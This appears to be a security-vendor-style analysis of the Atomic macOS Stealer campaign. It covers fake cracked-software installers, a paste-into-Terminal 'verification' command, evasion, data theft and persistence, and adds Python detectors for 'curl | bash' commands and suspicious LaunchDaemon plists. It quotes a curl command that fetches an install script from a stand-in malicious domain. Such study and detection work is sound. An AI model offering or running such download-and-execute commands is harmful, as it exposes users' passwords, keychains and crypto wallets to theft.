Atomic Stealer Hidden in Pirated Software

The cybersecurity landscape for macOS users has taken a dangerous turn as cybercriminals increasingly target Apple’s ecosystem with sophisticated malware campaigns.

Atomic macOS Stealer (AMOS), a specialized data-theft malware, has emerged as one of the most significant threats to Mac users, particularly those seeking cracked software applications.

While macOS has historically maintained a reputation as a more secure operating system compared to Windows, this perception is rapidly changing.

The growing popularity of Apple devices among professionals and high-value targets has made the platform increasingly attractive to cybercriminals.

AMOS represents a paradigm shift in Mac-targeted malware, demonstrating that Apple users can no longer rely solely on their operating system’s reputation for security.

Trend Micro has identified and classified this threat as Trojan.MacOS.Amos.PFH, highlighting its significance in the current threat landscape.

The malware specifically targets macOS users through deceptive distribution methods that exploit users’ desire to access expensive software without paying licensing fees.

The AMOS campaign employs two primary infection vectors, both designed to circumvent macOS security features through social engineering rather than technical exploits.

Method 1: Malicious DMG Files

Attackers distribute AMOS through fake cracked applications, particularly targeting users searching for popular software like CleanMyMac.

CleanMyMac’s download page on HaxMac site, with download links redirecting to AMOS’ landing page.

When victims click “Download for MacOS” on malicious websites, they receive a .dmg installer file with randomized version numbers such as “Installer_v.2.13.dmg” or “Installer_v.7.26.dmg”. These files masquerade as legitimate installers but contain the malicious payload.

However, Apple Gatekeeper technology has proven effective against this distribution method.

Trend Vision One Workbench detections used for initial triage.

On systems running macOS Sequoia, these unsigned .dmg files are automatically blocked, with the system displaying warnings that “Apple could not verify the installer is free of malware.” This represents a significant victory for Apple’s built-in security measures.

Method 2: Terminal Command Injection

The more successful distribution method involves instructing users to execute malicious commands directly in the macOS Terminal.

Historically, the affected users that we investigated visited the website haxmac[.]cc several times in the past month.

Visualization of the user visiting the URL haxmac.cc to download cracked software for macOS.

This technique mirrors the “fake CAPTCHA” approach seen in Windows malware campaigns. Users are presented with what appears to be a verification step, requiring them to copy and paste a command like:

curl -fsSL https://malicious-domain.com/install.sh

This method proves highly effective because it bypasses Gatekeeper entirely by having users voluntarily execute the malicious code. The technique exploits user trust and the perceived legitimacy of terminal commands.
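The copy-and-paste pattern described above is something endpoint telemetry can flag. The following is an added example (not Trend Micro's detection logic or anything from the campaign): it scores process-execution records where curl is run silently from an interactive terminal to fetch a shell script or feed one into a shell. The record layout ("parent|command line"), the parent-app names and all URLs are constructed assumptions.

```python
import re
from typing import NamedTuple

# Constructed sample process records (not real telemetry), "parent|command".
SAMPLE_EVENTS = [
    "Terminal|curl -fsSL https://redirector.example.invalid/install.sh | bash",
    "Terminal|curl -O https://example.invalid/tool.pkg",
    "Terminal|/bin/sh -c \"$(curl -fsSL https://redirector.example.invalid/install.sh)\"",
    "iTerm2|curl -fsSL https://api.example.invalid/status.json",
    "Finder|osascript -e 'display dialog \"hi\"'",
]

TERMINAL_APPS = {"Terminal", "iTerm2"}  # assumed names of interactive terminal parents
# curl, its short/long flags, then the first http(s) URL (quotes and ')' excluded)
CURL_RE = re.compile(r"\bcurl\b((?:\s+-{1,2}[A-Za-z-]+)*)\s+['\"]?(https?://[^\s'\")]+)")
# "... | sh", "| sudo bash", "| /bin/zsh" after the download
PIPE_SH_RE = re.compile(r"\|\s*(?:sudo\s+)?(?:/bin/|/usr/bin/)?(?:ba|z)?sh\b")
# sh -c "$(curl ...)" command-substitution form
SUBST_RE = re.compile(r"(?:ba|z)?sh\s+-c\s+.*\$\(\s*curl\b")


class Finding(NamedTuple):
    parent: str
    url: str
    reasons: tuple


def analyze(event: str):
    """Return a Finding when a curl invocation looks like a paste-to-terminal installer."""
    parent, _, cmd = event.partition("|")
    m = CURL_RE.search(cmd)
    if not m:
        return None
    flags, url = m.group(1), m.group(2)
    reasons = []
    # -s/--silent hides progress output, typical of one-line "verification" commands
    if "--silent" in flags or re.search(r"\s-[A-Za-z]*s", flags):
        reasons.append("silent-curl")
    if PIPE_SH_RE.search(cmd) or SUBST_RE.search(cmd):
        reasons.append("pipe-or-subst-to-shell")
    if url.lower().endswith(".sh"):
        reasons.append("fetches-shell-script")
    if parent in TERMINAL_APPS:
        reasons.append("interactive-terminal")
    # Only the script-execution indicators make a finding; silent downloads alone are normal.
    if "pipe-or-subst-to-shell" in reasons or "fetches-shell-script" in reasons:
        return Finding(parent, url, tuple(reasons))
    return None


def triage(events):
    return [f for f in (analyze(e) for e in events) if f is not None]
```

Running triage(SAMPLE_EVENTS) flags only the first and third records; the plain .pkg download and the JSON fetch are left alone.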

Advanced Evasion Techniques

AMOS operators demonstrate sophisticated understanding of cybersecurity defenses through several evasion strategies:

Domain Rotation: The campaign employs constantly changing domains and URLs for download commands, including redirector domains like “dtxxbz1jq070725p93.cfd” and “goipbp9080425d4.cfd”. This technique helps evade static URL-based detection systems and complicates takedown efforts.

Environment Detection: The malware includes anti-analysis features that check for virtualized environments, looking for indicators like “QEMU,” “VMware,” or “KVM” in system profiles. If virtualization is detected, the script exits to avoid analysis by security researchers.

Living-off-the-Land: AMOS heavily utilizes legitimate macOS utilities like osascript, curl, and AppleScript to perform malicious activities, making detection more challenging as these are normal system components.

A curl command was used to retrieve the file install.sh from letrucvert[.]com; in some cases, it is retrieved from goatramz[.]com.

Curl command was used to download install.sh from letrucvert[.]com.

Once successfully installed, AMOS demonstrates extensive data collection capabilities that pose serious privacy and security risks:

Browser Data: The malware targets all major browsers including Chrome, Firefox, Safari, Edge, Opera, Brave, and Vivaldi, stealing saved passwords, cookies, and browsing history.

Cryptocurrency Assets: AMOS specifically targets desktop cryptocurrency wallet applications, attempting to steal wallet files and private keys that could provide access to digital assets.

System Information: The malware collects detailed system profiles, usernames, passwords, and keychain data, providing attackers with comprehensive information about the compromised system.

Personal Files: The stealer searches for and exfiltrates various file types including documents (.txt, .pdf, .docx), wallet files, and database files from common locations like Desktop, Documents, and Downloads folders.

Messaging Applications: AMOS targets Telegram data and other communication platforms, potentially compromising private conversations and contacts.

AMOS establishes persistence through sophisticated methods that ensure continued access even after system reboots.

The malware creates hidden files with names like “.helper” and “.agent” in user directories, then installs a LaunchDaemon configuration file that ensures automatic execution at system startup.

The data exfiltration process involves compressing stolen information into ZIP archives and transmitting them to command-and-control servers via HTTP POST requests.

The malware uses custom headers and encoded identifiers to authenticate transfers and track compromised systems.
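The persistence mechanism described above (hidden files such as ".helper" or ".agent" in a user directory, launched by a LaunchDaemon at startup) leaves a launchd plist that can be audited. The following is an added example, not code from the campaign or from Trend Micro: it parses launchd plists and flags ones whose program is a hidden file under a user-writable path or is an interpreter such as sh or osascript. The two embedded plists, their labels and paths are constructed for illustration.

```python
import os
import plistlib
import posixpath

# Constructed launchd plists (not artifacts from the campaign); labels and paths are made up.
SUSPECT_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
<key>Label</key><string>com.example.helper</string>
<key>ProgramArguments</key><array><string>/bin/sh</string><string>/Users/alice/.helper</string></array>
<key>RunAtLoad</key><true/>
</dict></plist>"""

BENIGN_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
<key>Label</key><string>com.example.backup</string>
<key>ProgramArguments</key><array><string>/usr/local/bin/backup</string><string>--nightly</string></array>
<key>StartInterval</key><integer>3600</integer>
</dict></plist>"""

USER_PATH_PREFIXES = ("/Users/", "/tmp/", "/var/tmp/", "/private/tmp/")
# Interpreters a daemon should rarely be launched through directly (living-off-the-land)
SCRIPT_HOSTS = {"sh", "bash", "zsh", "osascript", "curl", "python3"}
LAUNCHD_DIRS = ("/Library/LaunchDaemons", "/Library/LaunchAgents")


def triage_plist(raw: bytes):
    """Return (label, reasons); an empty reasons list means nothing suspicious was found."""
    plist = plistlib.loads(raw)
    args = list(plist.get("ProgramArguments", []))
    if "Program" in plist:  # Program is an alternative to ProgramArguments[0]
        args.insert(0, plist["Program"])
    reasons = []
    for a in args:
        # a dotfile under a user-writable directory, e.g. /Users/<name>/.helper
        if a.startswith(USER_PATH_PREFIXES) and posixpath.basename(a).startswith("."):
            reasons.append(f"hidden-file-in-user-dir:{a}")
    if args and posixpath.basename(args[0]) in SCRIPT_HOSTS:
        reasons.append(f"interpreter-launcher:{args[0]}")
    if plist.get("RunAtLoad") and reasons:
        reasons.append("run-at-load")  # executes at boot/login, matching the persistence described
    return plist.get("Label", "?"), reasons


def scan_launchd_dirs(dirs=LAUNCHD_DIRS):
    """Triage every .plist in the given directories; returns {path: reasons} for hits only."""
    hits = {}
    for d in dirs:
        for name in (os.listdir(d) if os.path.isdir(d) else []):
            if name.endswith(".plist"):
                path = os.path.join(d, name)
                with open(path, "rb") as fh:
                    _, reasons = triage_plist(fh.read())
                if reasons:
                    hits[path] = reasons
    return hits
```

On a live Mac, scan_launchd_dirs() with the default directories (or the per-user ~/Library/LaunchAgents) gives a first pass; each hit still needs a look at the referenced file itself.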

Modern endpoint detection and response solutions have proven effective at identifying AMOS infections through behavioral analysis.

Trend Vision One’s Workbench feature has successfully detected campaigns through alerts such as “Possible Credential Access from Web Browsers – MacOS” and “Input Capture via Password Prompt – MacOS.”

These detection capabilities rely on correlating suspicious activities across the attack chain, from initial execution through data exfiltration, providing security teams with comprehensive visibility into the compromise process.

The AMOS campaign represents a significant evolution in Mac-targeted malware, demonstrating that social engineering remains more effective than technical exploits against modern operating systems.

The threat actors’ quick adaptation from .dmg-based distribution to terminal commands following macOS Sequoia’s enhanced protections shows the dynamic nature of the threat landscape.

Security experts anticipate continued evolution in Mac malware tactics, potentially including increased use of malvertising on legitimate platforms, search engine optimization poisoning to promote fake installers, and more sophisticated abuse of living-off-the-land binaries.

The campaign also highlights the importance of defense-in-depth strategies that don’t rely solely on built-in operating system protections.

While Apple’s Gatekeeper successfully blocked traditional installer-based attacks, the terminal command method proved highly effective in bypassing these protections.


About Cybernoz

Security researcher and threat analyst with expertise in malware analysis and incident response.